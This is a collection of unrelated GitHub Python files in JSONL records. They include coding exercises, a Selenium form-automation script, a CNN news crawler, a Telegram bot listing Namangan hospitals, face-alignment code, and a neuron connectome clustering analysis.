(argv[2]))\n usage(argv[0])\n\n if not (argv[3] == '1' or argv[3] == '2' or argv[3] == '3' or argv[3] == '4'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[3]))\n usage(argv[0])\n\n if not (argv[4] == 'Y' or argv[4] == 'N'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[4]))\n usage(argv[0])\n \n test_problem = []\n if problem == '1':\n test_problem = [['H','K']]\n elif problem == '2':\n test_problem = [['M','Y']]\n elif problem == '3':\n test_problem = [['I','J']]\n elif problem == '4':\n test_problem = [['H','K','M','Y','I','J']]\n\n return [model_type, test_problem, reduction]\n\n\nif __name__ == '__main__':\n\n # check program parameter\n ret_arg = checkarg(sys.argv)\n model_type = ret_arg[0]\n problem = ret_arg[1]\n reduction = ret_arg[2]\n\n data=pd.read_csv(sys.argv[1],header=None)\n print('Loading data from file [{}]'.format(sys.argv[1]))\n print('\\t Loaded data: {}\\n'.format(data.shape))\n \n analyze(data, model_type, problem, reduction)","repo_name":"kbckbc/washu_fl22_cse514","sub_path":"train_model/dd.py","file_name":"dd.py","file_ext":"py","file_size_in_byte":8948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19111386077","text":"def check_age(users, age):\n count = 0\n for i, user in enumerate(users):\n try:\n user_age = int(user['age'])\n except KeyError:\n print(f'Niepoprawne dane: {user}')\n except ValueError:\n print(f'Niepoprawny wiek: {user}')\n else:\n count += 1 if user_age < age else 0\n finally:\n print(f\"{i} - {user}\")\n return count\n\n\nvalid_data = [{'name': 'Jan', 'age': '10'}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\ninvalid_date = [{}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\ninvalid_data2 = [{'name': 'Jan', 'age': 'age'}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\n\nprint(check_age(valid_data, 15))\nprint(check_age(invalid_date, 15))\nprint(check_age(invalid_data2, 15))\n","repo_name":"dev-com2020/szkolenie_061222","sub_path":"kod_czwartek/bledy.py","file_name":"bledy.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20670189975","text":"# imagine we are writing a programme for Hospital in python and we need to check his name , if he is a existing patient , age , patient history and assign him to a doctor baseed on his need\n\n\n# taking his name \nname = 'Jhon Smith'\n# If he is a existing patient\nif_existing = False\n\n# age ( int )\n\nage = 20\n\n\n# new patiend?\n\nnew_Patient = True\n\n# patient History\n\n\npatient_History ='Fever , cough Probably Flu'\n\n# assigned Doctor\n\ndoctor = 'Dr. Tahia Rahman'\n\n\n# patient_conclusion = doctor + 'diagnosed that ' + name + age + 'has '+patient_History + 'its Flu' + 'his age is '+age+'and he is a '+new_Patient;","repo_name":"sakibahammed/python-fundamentals","sub_path":"hospital.py","file_name":"hospital.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4379286413","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nnavegador=webdriver.Chrome()\n\n# abrir a página index (entrar no site da busca jurídica)\nimport os\nimport time\nimport pandas as pd\n\ntabela=pd.read_excel('Processos.xlsx')\nprint(tabela)\n\ncaminho = os.getcwd()\narquivo = caminho + r\"\\index.html\"\n\nnavegador.get(arquivo)\n\nxpathDf='/html/body/div/div/div/a[1]'\nxpathRio='/html/body/div/div/div/a[2]'\nxpathSp='/html/body/div/div/div/a[3]'\nmenu=navegador.find_element(By.XPATH,'/html/body/div/div/button')\n\nfrom selenium.webdriver import ActionChains\n\nfor linha in tabela.index:\n if tabela.loc[linha,'Cidade']=='Distrito Federal':\n item=navegador.find_element(By.XPATH,xpathDf)\n elif tabela.loc[linha,'Cidade']=='Rio de Janeiro':\n item=navegador.find_element(By.XPATH,xpathRio)\n else:\n item=navegador.find_element(By.XPATH,xpathSp)\n ActionChains(navegador).move_to_element(menu).perform()\n time.sleep(2)\n item.click()\n time.sleep(2)\n listaAbas=navegador.window_handles\n\n abaOriginal=navegador.window_handles[0]\n novaAba=navegador.window_handles[1]\n navegador.switch_to.window(novaAba)\n\n try:\n navegador.find_element(By.ID,'nome').send_keys(tabela.loc[linha,'Nome'])\n navegador.find_element(By.ID,'advogado').send_keys(tabela.loc[linha,'Advogado'])\n navegador.find_element(By.ID,'numero').send_keys(tabela.loc[linha,'Processo'])\n navegador.find_element(By.XPATH,'//*[@id=\"formulario\"]/div/button').click()\n except:\n print('Elemento inexistente na aba/pagina atual')\n time.sleep(0.5)\n alerta=navegador.switch_to.alert\n alerta.accept()\n time.sleep(3)\n i=0\n while i<30:\n try:\n alerta=navegador.switch_to.alert\n if \"Processo encontrado com sucesso\" in alerta.text:\n alerta.accept()\n tabela.loc[linha, \"Status\"] = \"Encontrado\"\n else:\n alerta.accept()\n tabela.loc[linha, \"Status\"] = \"Não encontrado\"\n break\n except:\n time.sleep(2)\n i+=1\n \n navegador.close()\n navegador.switch_to.window(abaOriginal)\n\nprint(tabela)\ntabela.to_excel('ProcessosAtualizados.xlsx')\n\n\n\n\n\ntime.sleep(5)","repo_name":"jharbes/hashtagPython","sub_path":"028-automacaoWeb-selenium/26-exercicio-processoConsultaSites/exercicio-processoConsultaSites.py","file_name":"exercicio-processoConsultaSites.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37721284966","text":"import csv\n\n\n\ndef parse_ox_csv(filename):\n result = []\n with open(filename, \"r\") as f:\n reader = csv.reader(f)\n\n # pull of column names\n header = next(reader)\n for row in reader:\n result_row = []\n # pull off row names\n data = row[1:]\n for cell in data:\n try:\n result_row.append(float(cell))\n except ValueError:\n result_row.append(None)\n result.append(result_row)\n return result\n\nif __name__ == \"__main__\":\n\n t1 = parse_ox_csv(\"../resources/testdata/1/raw_data.csv\")\n print(t1[0])\n\n\n","repo_name":"rwalk/rsk","sub_path":"util/oxcsv.py","file_name":"oxcsv.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19626249346","text":"import sys\r\nimport os\r\n\r\nfrom face_alignment import mtcnn\r\nimport argparse\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nimport random\r\nfrom datetime import datetime\r\nmtcnn_model = mtcnn.MTCNN(device='cpu', crop_size=(112, 112))\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef add_padding(pil_img, top, right, bottom, left, color=(0,0,0)):\r\n width, height = pil_img.size\r\n new_width = width + right + left\r\n new_height = height + top + bottom\r\n result = Image.new(pil_img.mode, (new_width, new_height), color)\r\n result.paste(pil_img, (left, top))\r\n return result\r\n\r\n\r\ndef get_aligned_face(image_path):\r\n img = cv2.cvtColor(image_path, cv2.COLOR_BGR2RGB) #ada2 ada3\r\n img = Image.fromarray(img)\r\n # find face\r\n try:\r\n bboxes, faces = mtcnn_model.align_multi(img, limit=1)\r\n face = faces[0]\r\n except Exception as e:\r\n face = None\r\n box=None\r\n\r\n if(face != None):\r\n bboxes=list(np.reshape(bboxes,5))\r\n bboxes.pop()\r\n bboxes=[int(x) for x in bboxes ]\r\n a=bboxes.pop(0)\r\n bboxes.append(a)\r\n bboxes=[bboxes]\r\n box = [tuple(x) for x in bboxes]\r\n return face,box\r\n","repo_name":"grmos/Face-Recognition-for-Ar-smart-glasses-with-eye-tracker","sub_path":"face_alignment/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28042167316","text":"import json\n\nwith open(\"all_idioms.json\", 'r', encoding='utf-8') as file:\n idioms = tuple(json.load(file))\n\nunique = []\nfor phrase in idioms:\n dicts = [sem['dictionary'] for sem in phrase['semantics'] if 'dictionary' in sem]\n if len(dicts) == len(set(dicts)) and len(set(dicts)) > 1:\n unique.append(phrase)\n\nprint(len(unique))\n\nwith open('idioms_in_dicts.json', 'w', encoding='utf8') as fp:\n json.dump(unique, fp, ensure_ascii=False, indent=4)\n","repo_name":"katearb/idioms","sub_path":"collection_processing/get_uniques.py","file_name":"get_uniques.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74807876966","text":"from aiogram.dispatcher.filters import Text, Command\nfrom aiogram.types import ReplyKeyboardMarkup, ReplyKeyboardRemove, Message\nfrom loader import dp, bot\nfrom keyboards.default.shahar_shifoxona import shaharShifo\nfrom keyboards.default.menuKeyboard import menuStart\nfrom states.locstates import locstates\nfrom aiogram.dispatcher import FSMContext\n\n@dp.message_handler(text=\"NAMANGAN SHAHAR BOLALAR SHIFOXONASI\", state=\"*\")\nasync def send_agronam(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAODY7PgeEPKVG4N8qJrUvtzKeEr1IkAArHAMRsTBKFJUYd2M-OcX7UBAAMCAAN4AAMtBA'\n \n text = \"NAMANGAN SHAHAR BOLALAR SHIFOXONASI\\n\"\n text += \"Manzil: Go'zal dahasi 4-uy\\n\"\n text += \"Mo'ljal: Go'zal shifoxonasi orqasida\\n Tel: +998 69 237 16 48, +998 69 237 10 43\\n\"\n text += \"Ish tartibi: 24/7\"\n \n await message.answer_location(latitude=\"41.00796883587812\", longitude=\" 71.62345267916557\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n \n@dp.message_handler(text=\"NAMANGAN VILOYATINING YUQUMLI KASALLIKLAR SHIFOXONASI\", state=\"*\")\nasync def send_sanoat(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAICAAFjs-3qLQJdT53wFPYrdcCIfihjvQACr8AxGxMEoUmGWODg3mWa9QEAAwIAA3gAAy0E'\n \n text = \"NAMANGAN VILOYATINING YUQUMLI KASALLIKLAR SHIFOXONASI\\n\"\n text += \"Manzil: K.Otamirzayev ko'chasi 90-uy\\n\"\n text += \"Mo'ljal: Doctor A xususiy klinikasi\\nTel: +998 69 224 73 58, +998 69 224 69 15\\n\"\n text += \"Ish tartibi: 24/7\"\n \n await message.answer_location(latitude=\"40.99052274911174\", longitude=\"71.70909736965017\") \n await message.reply_photo(file_id, caption=text)\n await state.finish() \n\n@dp.message_handler(text=\"RESPUBLIKA IXTISOSLASHTIRILGAN AKUSHERLIK VA GINEKOLOGIYA ILMIY - AMALIY TIBBIYOT MARKAZINING NAMANGAN FILIALI\", state=\"*\")\nasync def send_ipa(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAICAmOz7q-dEpQD7rziz3mm8QGvKNU1AAKuwDEbEwShSeMcnOf57i9tAQADAgADbQADLQQ'\n \n text = \"Respublika Ixtisoslashtirilgan Akusherlik va Ginekologiya Ilmiy-Amaliy Tibbiyot Markazi Namangan Filiali\\n\"\n text += \"Manzil: Boburshox ko'chasi 143A-uy\\n\"\n text += \"Mo'ljal: Yuqumli kasalliklar shifoxonasi\\nTel: +998 69 239 38 03\\n\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 07:00-19:00, tushliksiz\"\n \n await message.answer_location(latitude=\"40.99535848695003\", longitude=\"71.64694200841065\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"NAMANGAN VILOYAT KO'P TARMOQLI TIBBIYOT MARKAZI\", state=\"*\")\nasync def send_hamkor(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIB5WOz7YyBRvHnmhfnFmWBPziix8dfAAKwwDEbEwShSZdycp0AASprrQEAAwIAA3kAAy0E'\n \n text = \"Namangan viloyat ko'p tarmoqli tibbiyot markazi\\n\"\n text += \"Manzil: Nomongoniy ko'chasi 9-uy\\n\"\n text += \"Mo'ljal: Sayhun mehmonxonasi\\nTel: +998 69 226 20 04, +998 69 226 36 00\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00, tushliksiz\"\n \n await message.answer_location(latitude=\"41.00393608604384\", longitude=\"71.66104554126807\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"ANGIOMED\", state=\"*\")\nasync def send_asaka(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAN2Y7PgdVeL6gVp1LM66BEMahkbETwAAqXAMRsTBKFJAAE8C2H-sFFjAQADAgADeAADLQQ'\n \n text = \"ANGIOMED\\n\"\n text += \"Manzil: I.Karimov ko'chasi\\nTel: +998 78 888 00 01\\n\"\n text += \"Mo'ljal: Namangan mehmonxonasi, NBU bank oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00\"\n \n await message.answer_location(latitude=\"40.99625761004835\", longitude=\"71.58655921917563\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"Rano medical center\", state=\"*\")\nasync def send_infin(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIByGOz7J_NiUUyyNEZGijae-brSbz1AALNwDEbEwShSZMcdoMKIv1ZAQADAgADeAADLQQ'\n \n text = \"Rano medical center\\n\"\n text += \"Manzil: I.Karimov ko'chasi\\nTel: +998 69 232 90 09\\n\"\n text += \"Mo'ljal: Al-mashriq oshxonasi yonida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-18:00\"\n \n await message.answer_location(latitude=\"40.99639110137484\", longitude=\"71.59026379416488\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"HABIB shifoxonasi\", state=\"*\")\nasync def send_trast(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIB42Oz7YNyr9cAAXVwRA9VTKHU55IVFQACz8AxGxMEoUlaoFyF8S2X-QEAAwIAA3gAAy0E'\n \n text = \"HABIB shifoxonasi\\n\"\n text += \"Manzil: Xotira ko'chasi 5-uy\\nTel: +998 90 555 52 25\\n\"\n text += \"Mo'ljal: 5-oila poliklinasi oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 09:00-17:00\"\n \n await message.answer_location(latitude=\"41.00063794372812\", longitude=\"71.61002748966733\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"5-oila poliklinasi\", state=\"*\")\nasync def send_mikro(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAIBxmOz69xtmNWu3EjITrxw_2v5-9-GAAKtwDEbEwShSVvGznXCO8VnAQADAgADeQADLQQ'\n \n text = \"5-oila poliklinasi\\n\"\n text += \"Manzil: Xotira ko'chasi 71A, 5A-kichik noxiya \\nTel: +998 69 232 50 71\\n\"\n text += \"Mo'ljal: Koson petak tarafda\"\n text += \"Ish tartibi: Dushanbadan-Shanbagacha 08:00-20:00\"\n \n await message.answer_location(latitude=\"41.000552061203145\", longitude=\"71.61042198414846\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"Galomed\", state=\"*\")\nasync def send_ipak(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAANzY7PgdNYMb8q8Y-zz2tQDRv9AGJ4AAqTAMRsTBKFJTpIrB-oPCwQBAAMCAANtAAMtBA'\n \n text = \"Galomed\\n\"\n text += \"Manzil: 1-kichik noxiya, Sportchilar ko'chasi \\nTel: +998 95 307 00 70\\n\"\n text += \"Mo'ljal: 56-maktab oldida\\n\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 08:00-20:00\"\n \n await message.answer_location(latitude=\"41.003701653981\", longitude=\"71.59076202766865\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n@dp.message_handler(text=\"\\\"ZZZ\\\" ko'z klinikasi\", state=\"*\")\nasync def send_nbu(message:Message, state=FSMContext):\n \n file_id = 'AgACAgIAAxkBAAMcY7PfV-iWrxClRzxhoJeO0c2UUQYAAo3AMRsTBKFJo0KrcOgQjmkBAAMCAAN5AAMtBA'\n \n text = \"\\\"ZZZ\\\" ko'z klinikasi\\n\"\n text += \"Manzil: 2-kichik noxiya \\n\"\n text += \"Mo'ljal: 1-shahar roddom, \\\"Navbahor\\\" stadioni \\nTel: +998 69 232 91 63\"\n text += \"Ish tartibi: Dushanbadan-Jumagacha 09:00-16:00, Shanba - 08:00-14:00\"\n \n await message.answer_location(latitude=\"41.000267811219075\", longitude=\"71.58959532489571\") \n await message.reply_photo(file_id, caption=text)\n await state.finish()\n\n# @dp.message_handler(text=\"G'ishtli bolnitsa\", state=locstates.hospital)\n# async def send_nbu(message:Message, state=FSMContext):\n \n# file_id = ''\n \n# text = \"G'ishtli bolnitsa\\n\"\n# text += \"Manzil: 2-kichik noxiya\\n\"\n# text += \"Mo'ljal: \\\"ZZZ\\\" ko'z klinikasi oldida\\nTel: +998 -------\"\n# text += \"Ish tartibi: Dushanbadan-Shanbagacha 08:00-19:00\"\n \n# await message.answer_location(latitude=\"41.000591816121926\", longitude=\"71.5901996191277\") \n# await message.reply_photo(file_id, caption=text)\n# await state.finish()\n\n@dp.message_handler(text=\"👈 Ortga\", state=\"*\")\nasync def back_hos(message:Message, state=FSMContext):\n await message.answer(\"Ortga\", reply_markup=menuStart)\n await state.finish()\n\n","repo_name":"AzimjonNosirov/Bank-Bankomat-Shifoxona-Apteka-DXM-bot","sub_path":"handlers/users/hospitalHandler.py","file_name":"hospitalHandler.py","file_ext":"py","file_size_in_byte":7880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2418418881","text":"# 202203071358\n# https://leetcode-cn.com/problems/letter-case-permutation/\n# 给定一个字符串 s ,通过将字符串 s 中的每个字母转变大小写,我们可以获得一个新的字符串。\n# 返回 所有可能得到的字符串集合 。以 任意顺序返回输出。\n# 例:\n# 输入:s = \"a1b2\"\n# 输出:[\"a1b2\", \"a1B2\", \"A1b2\", \"A1B2\"]\nfrom typing import List\n\n\nclass Solution:\n def letterCasePermutation(self, s: str) -> List[str]:\n res = []\n length = len(s)\n if not length:\n return [\"\"]\n\n def dfs(start, tmp):\n if start == length or len(tmp) == length:\n res.append(tmp)\n return\n if s[start].isdigit():\n dfs(start+1, tmp + s[start])\n elif s[start].islower():\n dfs(start+1, tmp + s[start])\n dfs(start+1, tmp + s[start].upper())\n elif s[start].isupper():\n dfs(start+1, tmp + s[start])\n dfs(start+1, tmp + s[start].lower())\n\n dfs(0, \"\")\n return res\n\n","repo_name":"alex-1q84/leetcode","sub_path":"python/src/leetcode/begin_algorithm/letter_case_permutation.py","file_name":"letter_case_permutation.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75293407528","text":"\n'''The break statement'''\n# ‘break’ is used to come out of the loop when encountered. It instructs the program to – Exit the loop now.\n\n'''Example:'''\n\nfor i in range(0, 80):\n\tprint(i)\t#This will print 0, 1, 2 and 3\n\tif i == 3:\n\t\tbreak\n\n\n\n\n# Difference between else and break\nfor i in range(10):\n\tprint(i)\n\tif i==5:\n\t\tbreak\nelse:\n\tprint(\"this is inside else of for\")\t#not printed this hence so you see the loop isnt breaking after exhaustion by loop rather from break used \n","repo_name":"fykaa/Just-Learning-Python","sub_path":"34_break statment.py","file_name":"34_break statment.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"31656529222","text":"import scrapy\nimport re\nimport os.path\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.selector import HtmlXPathSelector\nfrom craigslist_sample.items import CNNItem\n\nclass MySpider(CrawlSpider):\n name = \"cnn\"\n allowed_domains = [\"cnn.com\"]\n start_urls = ['http://www.cnn.com/']\n \n base_url = 'http://www.cnn.com/sitemaps/sitemap-articles'\n year = ['2016','2015','2014','2013','2012','2011']\n month = ['12','11','10','09','08','07','06','05','04','03','02','01']\n \n def parse(self,response):\n for y in self.year:\n for m in self.month:\n url = self.base_url+'-'+y+'-'+m+'.xml'\n yield scrapy.Request(url,self.parseList)\n \n def parseList(self,response):\n nodename = 'loc'\n text = body_or_str(response)\n r = re.compile(r\"(<%s[\\s>])(.*?)()\" % (nodename, nodename), re.DOTALL)\n for match in r.finditer(text):\n url = match.group(2)\n yield scrapy.Request(url,self.parse_items)\n\n def parse_items(self, response):\n hxs = HtmlXPathSelector(response)\n items = []\n item = CNNItem()\n item[\"title\"] = hxs.select('//h1[@class=\"pg-headline\"]/text()').extract()\n item[\"article\"] = hxs.select('//div[@class=\"zn-body__paragraph\"]/text()').extract()\n item[\"link\"] = response.url\n items.append(item)\n splitUrl = response.url.split('/')\n year = splitUrl[3]\n month = splitUrl[4]\n day = splitUrl[5]\n name1 = item[\"title\"][0]\n name = \"\".join(re.findall(\"[a-zA-Z]+\", name1))\n article = \"\\n\".join(item['article'])\n save_path = os.path.join('data',year+\"-\"+month+\"-\"+day,name+\".txt\")\n if not os.path.exists(os.path.dirname(save_path)):\n try:\n os.makedirs(os.path.dirname(save_path))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n with open(save_path, 'a+') as f:\n f.write('name: {0} \\nlink: {1}\\n\\n {2}'.format(name, item['link'], article.encode('utf8')))\n return(items)\n","repo_name":"Helen-ChenHan/CNNnews","sub_path":"CNN/craigslist_sample/spiders/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3300730918","text":"# %% [markdown]\n# # THE MIND OF A MAGGOT\n\n# %% [markdown]\n# ## Imports\nimport os\nimport time\nimport warnings\n\nimport colorcet as cc\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom anytree import LevelOrderGroupIter, NodeMixin\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.linalg import orthogonal_procrustes\nfrom scipy.optimize import linear_sum_assignment\nfrom sklearn.exceptions import ConvergenceWarning\nfrom sklearn.metrics import adjusted_rand_score\nfrom sklearn.utils.testing import ignore_warnings\nfrom tqdm import tqdm\n\nimport pymaid\nfrom graspy.cluster import GaussianCluster\nfrom graspy.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed, selectSVD\nfrom graspy.models import DCSBMEstimator, RDPGEstimator, SBMEstimator\nfrom graspy.plot import heatmap, pairplot\nfrom graspy.simulations import rdpg\nfrom graspy.utils import augment_diagonal, binarize, pass_to_ranks\nfrom src.cluster import (\n MaggotCluster,\n add_connections,\n compute_pairedness_bipartite,\n crossval_cluster,\n fit_and_score,\n get_paired_inds,\n make_ellipses,\n plot_cluster_pairs,\n plot_metrics,\n predict,\n)\nfrom src.data import load_metagraph\nfrom src.graph import MetaGraph, preprocess\nfrom src.hierarchy import signal_flow\nfrom src.io import savecsv, savefig\nfrom src.pymaid import start_instance\nfrom src.visualization import (\n CLASS_COLOR_DICT,\n adjplot,\n barplot_text,\n gridmap,\n matrixplot,\n set_axes_equal,\n stacked_barplot,\n)\n\nwarnings.filterwarnings(action=\"ignore\", category=ConvergenceWarning)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n}\nfor key, val in rc_dict.items():\n mpl.rcParams[key] = val\ncontext = sns.plotting_context(context=\"talk\", font_scale=1, rc=rc_dict)\nsns.set_context(context)\n\nPLOT_MODELS = True\n\nnp.random.seed(8888)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name)\n\n\n# %% [markdown]\n# ## Load data\n# In this case we are working with `G`, the directed graph formed by summing the edge\n# weights of the 4 different graph types. Preprocessing here includes removing\n# partially differentiated cells, and cutting out the lowest 5th percentile of nodes in\n# terms of their number of incident synapses. 5th percentile ~= 12 synapses. After this,\n# the largest connected component is used.\n\nmg = load_metagraph(\"G\", version=\"2020-04-01\")\nmg = preprocess(\n mg,\n threshold=0,\n sym_threshold=False,\n remove_pdiff=True,\n binarize=False,\n weight=\"weight\",\n)\nmeta = mg.meta\n\n# plot where we are cutting out nodes based on degree\ndegrees = mg.calculate_degrees()\nfig, ax = plt.subplots(1, 1, figsize=(5, 2.5))\nsns.distplot(np.log10(degrees[\"Total edgesum\"]), ax=ax)\nq = np.quantile(degrees[\"Total edgesum\"], 0.05)\nax.axvline(np.log10(q), linestyle=\"--\", color=\"r\")\nax.set_xlabel(\"log10(total synapses)\")\n\n# remove low degree neurons\nidx = meta[degrees[\"Total edgesum\"] > q].index\nmg = mg.reindex(idx, use_ids=True)\n\n# remove center neurons # FIXME\nidx = mg.meta[mg.meta[\"hemisphere\"].isin([\"L\", \"R\"])].index\nmg = mg.reindex(idx, use_ids=True)\n\nmg = mg.make_lcc()\nmg.calculate_degrees(inplace=True)\nmeta = mg.meta\n\nadj = mg.adj\nmeta[\"inds\"] = range(len(meta))\n\n# %% [markdown]\n# ##\n# param_grid = {\n# \"embed\": [\"ase\", \"unscaled_ase\", \"lse\"],\n# \"realign\": [True, False],\n# \"reembed\": [True, False],\n# \"metric\": [\"ARI\", \"bic\", \"lik\"],\n# }\nparam_grid = {\n \"embed\": [\"ase\"],\n \"realign\": [False],\n \"reembed\": [False],\n \"metric\": [\"bic\"],\n}\n\nfrom sklearn.model_selection import ParameterGrid\n\nparams = list(ParameterGrid(param_grid))\nn_levels = 7\n\nmcs = []\nfor p in params:\n metric = p[\"metric\"]\n embed = p[\"embed\"]\n realign = p[\"realign\"]\n reembed = p[\"reembed\"]\n basename = f\"-{p}\".replace(\" \", \"\")\n basename = basename.replace(\":\", \"=\")\n basename = basename.replace(\",\", \"-\")\n basename = basename.replace(\"'\", \"\")\n print(basename)\n\n np.random.seed(8888)\n\n mc = MaggotCluster(\n \"0\",\n adj=adj,\n meta=meta,\n n_init=25,\n stashfig=stashfig,\n min_clusters=2,\n max_clusters=3,\n n_components=4,\n embed=embed,\n realign=realign,\n reembed=reembed,\n )\n\n for i in range(n_levels):\n for j, node in enumerate(mc.get_lowest_level()):\n node.fit_candidates(plot_metrics=False)\n for j, node in enumerate(mc.get_lowest_level()):\n node.select_model(2, metric=metric)\n mc.collect_labels()\n\n fig, axs = plt.subplots(1, n_levels, figsize=(10 * n_levels, 30))\n for i in range(n_levels):\n ax = axs[i]\n stacked_barplot(\n mc.meta[f\"lvl{i}_labels_side\"],\n mc.meta[\"merge_class\"],\n category_order=np.unique(mc.meta[f\"lvl{i}_labels_side\"].values),\n color_dict=CLASS_COLOR_DICT,\n norm_bar_width=False,\n ax=ax,\n )\n ax.set_yticks([])\n ax.get_legend().remove()\n\n stashfig(f\"count-barplot-lvl{i}\" + basename)\n plt.close()\n\n fig, axs = plt.subplots(1, n_levels, figsize=(10 * n_levels, 30))\n for i in range(n_levels):\n ax = axs[i]\n stacked_barplot(\n mc.meta[f\"lvl{i}_labels_side\"],\n mc.meta[\"merge_class\"],\n category_order=np.unique(mc.meta[f\"lvl{i}_labels_side\"].values),\n color_dict=CLASS_COLOR_DICT,\n norm_bar_width=True,\n ax=ax,\n )\n ax.set_yticks([])\n ax.get_legend().remove()\n\n stashfig(f\"prop-barplot-lvl{i}\" + basename)\n plt.close()\n\n for i in range(n_levels):\n fig, ax = plt.subplots(1, 1, figsize=(20, 20))\n adjplot(\n adj,\n meta=mc.meta,\n sort_class=f\"lvl{i}_labels_side\",\n item_order=\"merge_class\",\n plot_type=\"scattermap\",\n sizes=(0.5, 1),\n ticks=False,\n colors=\"merge_class\",\n ax=ax,\n palette=CLASS_COLOR_DICT,\n gridline_kws=dict(linewidth=0.2, color=\"grey\", linestyle=\"--\"),\n )\n stashfig(f\"adj-lvl{i}\" + basename)\n\n mcs.append(mc)\n\n\n# %%\nnodes = mc.get_lowest_level()\ncounts = []\nfor n in nodes:\n print(len(n.meta))\n counts.append(len(n.meta))\ncounts = np.array(counts)\nbig = np.max(counts)\nbig_ind = np.where(counts == big)[0][0]\n\n# %% [markdown]\n# ##\nnode = nodes[big_ind]\n\n# get number that are paired\nnode.meta[node.meta[\"Pair\"].isin(node.meta.index)]\n# 52 / 215 have a pair here\n\n# get degrees\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total edgesum\"], ax=ax)\nsns.distplot(meta[\"Total edgesum\"], ax=ax)\nstashfig(\"big-guy-edgesum-joint\")\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total degree\"], ax=ax)\nsns.distplot(meta[\"Total degree\"], ax=ax)\nstashfig(\"big-guy-degree-joint\")\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total edgesum\"], ax=ax)\nstashfig(\"big-guy-edgesum\")\n\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.distplot(node.meta[\"Total degree\"], ax=ax)\nstashfig(\"big-guy-degree\")\n\n# %% [markdown]\n# ##\nfrom src.visualization import plot_neurons\n\n\nstart_instance()\nkey = \"lvl6_labels\"\nfor tp in np.unique(mc.meta[key]):\n 